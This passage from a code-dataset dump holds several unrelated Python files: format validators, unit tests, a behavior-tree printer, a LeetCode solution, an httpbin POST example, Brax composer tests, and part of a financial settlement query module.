valid_passport_format(passport_number):\n    \"\"\"(int)->Boolean\n    Checks whether a passport number is five sets of\n    five alpha-number characters separated by dashes\n    :param passport_number: alpha-numeric string\n    :return: Boolean; True if the format is valid, False otherwise\n    \"\"\"\n    passport_format = re.compile('^\w{5}-\w{5}-\w{5}-\w{5}-\w{5}$')\n\n    if passport_format.match(passport_number):\n        return True\n    else:\n        return False\n\n\ndef valid_date_format(date_string):\n    \"\"\"(int)->Boolean\n    Checks whether a date has the format YYYY-mm-dd in numbers\n    :param date_string: date to be checked\n    :return: Boolean; True if the format is valid, False otherwise\n    \"\"\"\n    try:\n        datetime.datetime.strptime(date_string, '%Y-%m-%d')\n        return True\n    except ValueError:\n        return False","sub_path":"papers.py","file_name":"papers.py","file_ext":"py","file_size_in_byte":11390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"437627920","text":"import unittest\nfrom unittest.mock import patch, mock_open\n\n\nclass RobotCoreTest(unittest.TestCase):\n\n    def test_open_file(self):\n        with patch('builtins.open', mock_open(read_data='data')) as mock_file:\n            assert open('/').read() == 'data'\n            mock_file.assert_called_with('/')\n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"529306399","text":"from behaviortree.behavior import Behavior\nfrom behaviortree.composite import Composite\n\ndef dump_tree(tree: Composite, n: int = 1):\n    is_composite = hasattr(tree, \"_children\")\n    is_decorator = hasattr(tree, \"_child\")\n    symbol = \">\"\n    if is_composite: symbol = \"-\"\n    if is_decorator: symbol = \"@\"\n    item_name = tree._name\n    item_type = tree.__class__.__name__\n    if item_name == 
item_type: item_type = \"\"\n display = f\"|{symbol} {item_name}[{item_type}]\"\n print(\" \" * n + display)\n # dump children\n if is_composite:\n for child in tree._children:\n dump_tree(child, n + 1)\n if is_decorator:\n dump_tree(tree._child, n + 1)","sub_path":"src/behaviortree/trace.py","file_name":"trace.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"309507364","text":"from typing import List\nfrom Leetcode.utils import perf\n\n\nclass Solution:\n # tc: O(N * L)\n # sc: O(N * L)\n @perf\n def removeComments(self, source: List[str]) -> List[str]:\n in_block = False\n newline = []\n ans = []\n\n for line in source:\n i = 0\n\n while i < len(line):\n token = line[i : i+2]\n\n if in_block:\n if token == '*/':\n in_block = False\n i += 1 # bump it 1 so it moves 2 spaces and skips the forward-slash\n else:\n if token == '/*':\n in_block = True\n i += 1 # bump it 1 so it moves 2 spaces and skips the asterisk\n elif token == '//':\n break\n else:\n char = line[i]\n newline.append(char)\n\n i += 1\n\n # if in block then keep same array to concatenate code from previous lines before block comment started\n if not in_block:\n # Add newline only if not in block. Otherwise, duplicates will be added\n if newline:\n ln = ''.join(newline)\n ans.append(ln)\n newline.clear()\n\n return ans\n","sub_path":"Leetcode/remove_comments/solution_imp.py","file_name":"solution_imp.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"354743741","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n__author__ = 'Terry'\n\nimport requests\n\nheaders = {\n 'User-Agent': r'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) '\n r'Chrome/45.0.2454.85 Safari/537.36 115Browser/6.0.3',\n 'Referer': r'http://httpbin.org',\n 'Connection': 'keep-alive'\n}\ndata = {\n 'key1': 'value1',\n 'key2': 'value2'\n}\nurl = 'http://httpbin.org/post'\nr = requests.post(url, data=data, headers=headers, proxies={'http': '127.0.0.1:8888'})\nprint(r.text)\n\n","sub_path":"docs/s1106/requests_post_test.py","file_name":"requests_post_test.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"14950856","text":"# Copyright 2021 The Brax Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Composer tests.\"\"\"\n\nimport collections\nimport functools\nfrom absl.testing import absltest\nfrom absl.testing import parameterized\nfrom brax.experimental.composer import composer\nfrom brax.experimental.composer import observers\nfrom jax import numpy as jnp\n\n\nclass ComposerTest(parameterized.TestCase):\n \"\"\"Tests for Composer module.\"\"\"\n\n @parameterized.parameters('ant_push', 'ant_chase')\n def testEnvCreation(self, env_name):\n composer.create(env_name=env_name)\n\n def testObservationConcatSplit(self):\n 
leading_dims = (5, 4)\n obs_shapes = ((3, 4), (12,), (2, 2))\n obs_sizes = [\n functools.reduce(lambda x, y: x * y, shape) for shape in obs_shapes\n ]\n obs_vec_size = sum(obs_sizes)\n obs_dict = collections.OrderedDict([(i, jnp.zeros(leading_dims + shape))\n for i, shape in enumerate(obs_shapes)])\n # get observer_shapes\n obs_shapes_from_data = observers.get_obs_dict_shape(\n obs_dict, batch_shape=leading_dims)\n for s1, s2 in zip(obs_shapes, obs_shapes_from_data.values()):\n s2 = s2['shape']\n self.assertEqual(s1, s2, f'{s1} != {s2}')\n\n # concat\n obs = composer.concat_obs(obs_dict, obs_shapes_from_data)\n self.assertEqual(obs.shape, leading_dims + (obs_vec_size,),\n f'{obs.shape} != {leading_dims} + ({obs_vec_size},)')\n\n # split again\n obs_dict_2 = composer.split_obs(obs, obs_shapes_from_data)\n for s1, s2 in zip(obs_dict_2.values(), obs_shapes_from_data.values()):\n s1 = s1.shape\n s2 = s2['shape']\n self.assertEqual(s1, leading_dims + s2, f'{s1} != {leading_dims} + {s2}')\n\n\nif __name__ == '__main__':\n absltest.main()\n","sub_path":"brax/experimental/composer/tests/composer_test.py","file_name":"composer_test.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"441399183","text":"\"\"\" Compiled: 2020-09-18 10:38:49 \"\"\"\n\n#__src_file__ = \"extensions/settlement/etc/FSettlementStatusQueries.py\"\nimport acm\nimport FOperationsUtils as Utils\nfrom FOperationsDateUtils import GetAccountingCurrencyCalendar, AdjustDateToday\n\n\nfrom FSettlementEnums import RelationType, SettlementStatus, SettlementType\nfrom FOperationsEnums import TradeType, TradeStatus, InsType, SettleType\n\nCONST_UpdatedVoidRecalledStatusQuery = None\nCONST_UpdatedVoidStatusQuery = None\nCONST_PreReleasedStatusQuery = None\nCONST_PreReleasedStatusMaxDaysBackQuery = None\nCONST_ClosedStatusQuery = None\nCONST_ClosedRecalledStatusQuery = None\nCONST_PostReleasedStatusQuery = None\nCONST_CompensationPaymentQuery = None\nCONST_DefaultSettlementProcessQuery = None\nCONST_RecallStatusesQuery = None\nCONST_NetPartQuery = None\nCONST_NetParentsQuery = None\nCONST_DividendQuery = None\nCONST_CouponRedemptionQuery = None\nCONST_CouponQuery = None\nCONST_RedemptionQuery = None\nCONST_ApplicableForNettingQuery = None\nCONST_IsCancelledSettlementQuery = None\nCONST_IsClosingPayoutTradeQuery = None\nCONST_IsClosingTradeQuery = None\nCONST_IsNDFTradeQuery = None\nCONST_IsAdHocNetQuery = None\nCONST_CancelledSecuritiesQuery = None\nCONST_IsPostReleasedSettlementOrPartOfNetHierarchy = None\nCONST_IsVoidCancelCorrectChild = None\nCONST_IsCancelledSettlement = None\nCONST_PartialSettledQuery = None\nCONST_IsSecuritySettlementWithStatusReplaced = None\nCONST_IsSettledSecuritySettlementQuery = None\nCONST_PairOffHierarchyChildren = None\nCONST_PairOffPaymentsQuery = None\nCONST_PairOffChildrenQuery = None\nCONST_ValueDayAdjustedQuery = None\n\ndef GetUpdatedVoidRecalledStatusQuery():\n global CONST_UpdatedVoidRecalledStatusQuery\n if CONST_UpdatedVoidRecalledStatusQuery != None:\n return CONST_UpdatedVoidRecalledStatusQuery\n\n CONST_UpdatedVoidRecalledStatusQuery = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n CONST_UpdatedVoidRecalledStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.UPDATED))\n CONST_UpdatedVoidRecalledStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.VOID))\n CONST_UpdatedVoidRecalledStatusQuery.AddAttrNode('Status', 
'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.RECALLED))\n \n or2 = CONST_UpdatedVoidRecalledStatusQuery.AddOpNode('AND')\n or2.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.PENDING_AMENDMENT))\n or2.AddAttrNode('IsPartOfHierarchy', 'EQUAL', True)\n\n and1 = or2.AddOpNode('OR')\n and1.AddAttrNode('NumberOfChildren', 'EQUAL', 0)\n and1.AddAttrNode('Children.RelationType', 'NOT_EQUAL', RelationType.CANCEL_CORRECT)\n\n return CONST_UpdatedVoidRecalledStatusQuery\n\ndef GetUpdatedVoidStatusQuery():\n\n global CONST_UpdatedVoidStatusQuery\n if CONST_UpdatedVoidStatusQuery != None:\n return CONST_UpdatedVoidStatusQuery\n\n CONST_UpdatedVoidStatusQuery = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n or1 = CONST_UpdatedVoidStatusQuery.AddOpNode('OR')\n or1.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.UPDATED))\n or1.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.VOID))\n\n or2 = CONST_UpdatedVoidStatusQuery.AddOpNode('AND')\n or2.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.PENDING_AMENDMENT))\n or2.AddAttrNode('IsPartOfHierarchy', 'EQUAL', True)\n\n return CONST_UpdatedVoidStatusQuery\n\ndef GetPreReleasedStatusQuery():\n\n global CONST_PreReleasedStatusQuery\n if CONST_PreReleasedStatusQuery != None:\n return CONST_PreReleasedStatusQuery\n\n CONST_PreReleasedStatusQuery = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n CONST_PreReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.AUTHORISED))\n CONST_PreReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.EXCEPTION))\n CONST_PreReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.MANUAL_MATCH))\n CONST_PreReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.PENDING_AMENDMENT))\n CONST_PreReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.AWAITING_CANCELLATION))\n return CONST_PreReleasedStatusQuery\n\ndef GetPreReleasedStatusMaxDaysBackQuery():\n import FSettlementParameters as SettlementParameters\n global CONST_PreReleasedStatusMaxDaysBackQuery\n if CONST_PreReleasedStatusMaxDaysBackQuery != None:\n return CONST_PreReleasedStatusMaxDaysBackQuery\n\n calendar = GetAccountingCurrencyCalendar()\n startDate = AdjustDateToday(calendar, -SettlementParameters.maximumDaysBack)\n\n CONST_PreReleasedStatusMaxDaysBackQuery = acm.CreateFASQLQuery(acm.FSettlement, 'AND')\n CONST_PreReleasedStatusMaxDaysBackQuery.AddAttrNode('ValueDay', 'GREATER_EQUAL', startDate)\n orQuery = CONST_PreReleasedStatusMaxDaysBackQuery.AddOpNode('OR')\n orQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.AUTHORISED))\n orQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.EXCEPTION))\n orQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.MANUAL_MATCH))\n return CONST_PreReleasedStatusMaxDaysBackQuery\n\ndef GetClosedStatusQuery():\n global CONST_ClosedStatusQuery\n if CONST_ClosedStatusQuery != None:\n return CONST_ClosedStatusQuery\n CONST_ClosedStatusQuery = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n CONST_ClosedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.CLOSED))\n return CONST_ClosedStatusQuery\n\ndef 
GetClosedRecalledStatusQuery():\n global CONST_ClosedRecalledStatusQuery\n if CONST_ClosedRecalledStatusQuery != None:\n return CONST_ClosedRecalledStatusQuery\n\n CONST_ClosedRecalledStatusQuery = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n CONST_ClosedRecalledStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.RECALLED))\n CONST_ClosedRecalledStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.CLOSED))\n return CONST_ClosedRecalledStatusQuery\n\ndef GetPartialSettled():\n global CONST_PartialSettledQuery\n if CONST_PartialSettledQuery != None:\n return CONST_PartialSettledQuery\n CONST_PartialSettledQuery = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n CONST_PartialSettledQuery.AddAttrNode('PartialParent.Oid', 'NOT_EQUAL', 0)\n andQuery = CONST_PartialSettledQuery.AddOpNode('AND')\n andQuery.AddAttrNode('Parent.Oid', 'NOT_EQUAL', 0)\n andQuery.AddAttrNode('Parent.PartialParent.Oid', 'NOT_EQUAL', 0)\n return CONST_PartialSettledQuery\n\ndef GetCancelledSecuritiesQuery():\n global CONST_CancelledSecuritiesQuery\n if CONST_CancelledSecuritiesQuery != None:\n return CONST_CancelledSecuritiesQuery\n CONST_CancelledSecuritiesQuery = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n CONST_CancelledSecuritiesQuery.AddAttrNode('Parent.IsCancelledByUs', 'EQUAL', True)\n andNode = CONST_CancelledSecuritiesQuery.AddOpNode('AND')\n andNode.AddAttrNode('IsSecurity', 'EQUAL', True)\n andNode.AddAttrNode('IsCancelledByUs', 'EQUAL', True)\n return CONST_CancelledSecuritiesQuery\n\ndef GetPairOffHierarchyChildren():\n global CONST_PairOffHierarchyChildren\n if CONST_PairOffHierarchyChildren != None:\n return CONST_PairOffHierarchyChildren\n CONST_PairOffHierarchyChildren = acm.CreateFASQLQuery(acm.FSettlement, 'AND')\n CONST_PairOffHierarchyChildren.AddAttrNode('GetTopSettlementInHierarchy.NumberOfPairOffChildren', 'NOT_EQUAL', 0)\n return CONST_PairOffHierarchyChildren\n\ndef GetPairOffPaymentsQuery():\n global CONST_PairOffPaymentsQuery\n if CONST_PairOffPaymentsQuery != None:\n return CONST_PairOffPaymentsQuery\n CONST_PairOffPaymentsQuery = acm.CreateFASQLQuery(acm.FSettlement, 'AND')\n CONST_PairOffPaymentsQuery.AddAttrNode('Type', 'EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.PAIR_OFF_PAYMENT))\n return CONST_PairOffPaymentsQuery\n\ndef GetPairOffChildrenQuery():\n global CONST_PairOffChildrenQuery\n if CONST_PairOffChildrenQuery != None:\n return CONST_PairOffChildrenQuery\n CONST_PairOffChildrenQuery = acm.CreateFASQLQuery(acm.FSettlement, 'AND')\n CONST_PairOffChildrenQuery.AddAttrNode('PairOffParent.Oid', 'NOT_EQUAL', 0)\n return CONST_PairOffChildrenQuery\n\ndef GetPostReleasedStatusQuery():\n global CONST_PostReleasedStatusQuery\n if CONST_PostReleasedStatusQuery != None:\n return CONST_PostReleasedStatusQuery\n CONST_PostReleasedStatusQuery = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n CONST_PostReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.RELEASED))\n CONST_PostReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.ACKNOWLEDGED))\n CONST_PostReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.NOT_ACKNOWLEDGED))\n CONST_PostReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.PENDING_CLOSURE))\n CONST_PostReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', 
SettlementStatus.NON_RECEIPT))\n CONST_PostReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.INCORRECT_RECEIPT))\n CONST_PostReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.NON_PAYMENT))\n CONST_PostReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.INCORRECT_PAYMENT))\n CONST_PostReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.UNEXPECTED_CREDIT))\n CONST_PostReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.UNEXPECTED_DEBIT))\n CONST_PostReleasedStatusQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.HOLD))\n #Hold not actually postreleased status but treated the same way. Maybe change in future\n return CONST_PostReleasedStatusQuery\n\ndef GetCompensationPaymentQuery():\n global CONST_CompensationPaymentQuery\n if CONST_CompensationPaymentQuery != None:\n return CONST_CompensationPaymentQuery\n CONST_CompensationPaymentQuery = acm.CreateFASQLQuery(acm.FSettlement, 'AND')\n CONST_CompensationPaymentQuery.AddAttrNode('RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.COMPENSATION_PAYMENT))\n return CONST_CompensationPaymentQuery\n\ndef GetNetPartQuery():\n global CONST_NetPartQuery\n if CONST_NetPartQuery != None:\n return CONST_NetPartQuery\n CONST_NetPartQuery = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n CONST_NetPartQuery.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.NET))\n CONST_NetPartQuery.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.COUPON_NET))\n CONST_NetPartQuery.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.DIVIDEND_NET))\n CONST_NetPartQuery.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.REDEMPTION_NET))\n CONST_NetPartQuery.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.CLOSE_TRADE_NET))\n CONST_NetPartQuery.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.AD_HOC_NET))\n CONST_NetPartQuery.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.SECURITIES_DVP_NET))\n return CONST_NetPartQuery\n\ndef GetNetParentsQuery():\n global CONST_NetParentsQuery\n if CONST_NetParentsQuery != None:\n return CONST_NetParentsQuery\n\n CONST_NetParentsQuery = acm.CreateFASQLQuery(acm.FSettlement, 'AND')\n or2 = CONST_NetParentsQuery.AddOpNode('OR')\n or2.AddAttrNode('RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.NET))\n or2.AddAttrNode('RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.CLOSE_TRADE_NET))\n or2.AddAttrNode('RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.COUPON_NET))\n or2.AddAttrNode('RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.REDEMPTION_NET))\n or2.AddAttrNode('RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.DIVIDEND_NET))\n or2.AddAttrNode('RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.SECURITIES_DVP_NET))\n or1 = CONST_NetParentsQuery.AddOpNode('OR')\n or1.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', 
SettlementStatus.AUTHORISED))\n or1.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.EXCEPTION))\n or1.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.MANUAL_MATCH))\n or1.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.NOT_ACKNOWLEDGED))\n return CONST_NetParentsQuery\n\ndef GetDefaultSettlementProcessQuery():\n\n global CONST_DefaultSettlementProcessQuery\n if CONST_DefaultSettlementProcessQuery != None:\n return CONST_DefaultSettlementProcessQuery\n\n CONST_DefaultSettlementProcessQuery = acm.CreateFASQLQuery(acm.FTrade, 'AND')\n CONST_DefaultSettlementProcessQuery.AddAttrNode('Aggregate', 'EQUAL', 0)\n CONST_DefaultSettlementProcessQuery.AddAttrNode('Type', 'NOT_EQUAL', Utils.GetEnum('TradeType', TradeType.CASH_POSTING))\n\n orQuery = CONST_DefaultSettlementProcessQuery.AddOpNode('OR')\n orQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('TradeStatus', TradeStatus.FO_CONFIRMED))\n orQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('TradeStatus', TradeStatus.BO_CONFIRMED))\n orQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('TradeStatus', TradeStatus.BO_BO_CONFIRMED))\n return CONST_DefaultSettlementProcessQuery\n\ndef GetRecallStatusesQuery():\n global CONST_RecallStatusesQuery\n if CONST_RecallStatusesQuery != None:\n return CONST_RecallStatusesQuery\n CONST_RecallStatusesQuery = acm.CreateFASQLQuery(acm.FTrade, 'OR')\n CONST_RecallStatusesQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('TradeStatus', TradeStatus.VOID))\n CONST_RecallStatusesQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('TradeStatus', TradeStatus.CONFIRMED_VOID))\n CONST_RecallStatusesQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('TradeStatus', TradeStatus.TERMINATED))\n CONST_RecallStatusesQuery.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('TradeStatus', TradeStatus.SIMULATED))\n return CONST_RecallStatusesQuery\n\ndef GetDividendQuery():\n global CONST_DividendQuery\n if CONST_DividendQuery != None:\n return CONST_DividendQuery\n\n CONST_DividendQuery = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n\n and1 = CONST_DividendQuery.AddOpNode('AND')\n and1.AddAttrNode('Trade.Oid', 'GREATER', 0)\n and1.AddAttrNode('Type', 'EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.DIVIDEND))\n and1.AddAttrNode('SecurityInstrument.InsType', 'EQUAL', Utils.GetEnum('InsType', InsType.STOCK))\n and1.AddAttrNode('Trade.Instrument.InsType', 'NOT_EQUAL', Utils.GetEnum('InsType', InsType.TOTAL_RETURN_SWAP))\n and1.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.AUTHORISED))\n\n and4 = CONST_DividendQuery.AddOpNode('AND')\n\n orNetParentType = and4.AddOpNode('OR')\n andNetPartStatus = and4.AddOpNode('AND')\n\n orNetParentType.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.DIVIDEND_NET))\n andNetPartStatus.AddAttrNode('Status', 'NOT_EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.PENDING_AMENDMENT))\n\n return CONST_DividendQuery\n\ndef GetCouponRedemptionQuery():\n\n global CONST_CouponRedemptionQuery\n if CONST_CouponRedemptionQuery != None:\n return CONST_CouponRedemptionQuery\n CONST_CouponRedemptionQuery = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n\n and1 = CONST_CouponRedemptionQuery.AddOpNode('AND')\n and1.AddAttrNode('Trade.Oid', 'GREATER', 0)\n and1.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.AUTHORISED))\n or3 = and1.AddOpNode('OR')\n or3.AddAttrNode('Type', 'EQUAL', 
Utils.GetEnum('SettlementCashFlowType', SettlementType.COUPON))\n or3.AddAttrNode('Type', 'EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.REDEMPTION))\n\n andNodeNetpart = CONST_CouponRedemptionQuery.AddOpNode('AND')\n orNetParentType = andNodeNetpart.AddOpNode('OR')\n andNodeNetpart.AddAttrNode('Status', 'NOT_EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.PENDING_AMENDMENT))\n\n orNetParentType.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.COUPON_NET))\n orNetParentType.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.REDEMPTION_NET))\n\n\n return CONST_CouponRedemptionQuery\n\ndef GetCouponQuery():\n\n global CONST_CouponQuery\n if CONST_CouponQuery != None:\n return CONST_CouponQuery\n CONST_CouponQuery = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n\n and1 = CONST_CouponQuery.AddOpNode('AND')\n and1.AddAttrNode('Trade.Oid', 'GREATER', 0)\n and1.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.AUTHORISED))\n and1.AddAttrNode('Type', 'EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.COUPON))\n\n andNodeNetpart = CONST_CouponQuery.AddOpNode('AND')\n andNodeNetpart.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.COUPON_NET))\n andNodeNetpart.AddAttrNode('Status', 'NOT_EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.PENDING_AMENDMENT))\n\n\n return CONST_CouponQuery\n\ndef GetRedemptionQuery():\n\n global CONST_RedemptionQuery\n if CONST_RedemptionQuery != None:\n return CONST_RedemptionQuery\n CONST_RedemptionQuery = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n\n and1 = CONST_RedemptionQuery.AddOpNode('AND')\n and1.AddAttrNode('Trade.Oid', 'GREATER', 0)\n and1.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.AUTHORISED))\n and1.AddAttrNode('Type', 'EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.REDEMPTION))\n\n andNodeNetpart = CONST_RedemptionQuery.AddOpNode('AND')\n andNodeNetpart.AddAttrNode('Parent.RelationType', 'EQUAL', Utils.GetEnum('SettlementRelationType', RelationType.REDEMPTION_NET))\n andNodeNetpart.AddAttrNode('Status', 'NOT_EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.PENDING_AMENDMENT))\n\n\n return CONST_RedemptionQuery\n\n\ndef GetApplicableForNettingQuery(autoNetTypes = None):\n global CONST_ApplicableForNettingQuery\n if CONST_ApplicableForNettingQuery != None:\n return CONST_ApplicableForNettingQuery\n\n CONST_ApplicableForNettingQuery = acm.CreateFASQLQuery(acm.FSettlement, 'OR')\n\n and1 = CONST_ApplicableForNettingQuery.AddOpNode('AND')\n and1.AddAttrNode('Trade.Oid', 'GREATER', 0)\n and1.AddAttrNode('Status', 'EQUAL', Utils.GetEnum('SettlementStatus', SettlementStatus.AUTHORISED))\n\n and1.AddAttrNode('Parent', 'EQUAL', None)\n and1.AddAttrNode('SplitParent', 'EQUAL', None)\n if autoNetTypes:\n if 'Coupon' in autoNetTypes:\n and1.AddAttrNode('Type', 'NOT_EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.COUPON))\n if 'Redemption' in autoNetTypes:\n and1.AddAttrNode('Type', 'NOT_EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.REDEMPTION))\n if 'Dividend' in autoNetTypes:\n and1.AddAttrNode('Type', 'NOT_EQUAL', Utils.GetEnum('SettlementCashFlowType', SettlementType.DIVIDEND))\n\n and1.AddAttrNode('ManualMatch', 'EQUAL', 0)\n and1.AddAttrNode('RestrictNet', 'EQUAL', 0)\n\n and2 = CONST_ApplicableForNettingQuery.AddOpNode('AND')\n 
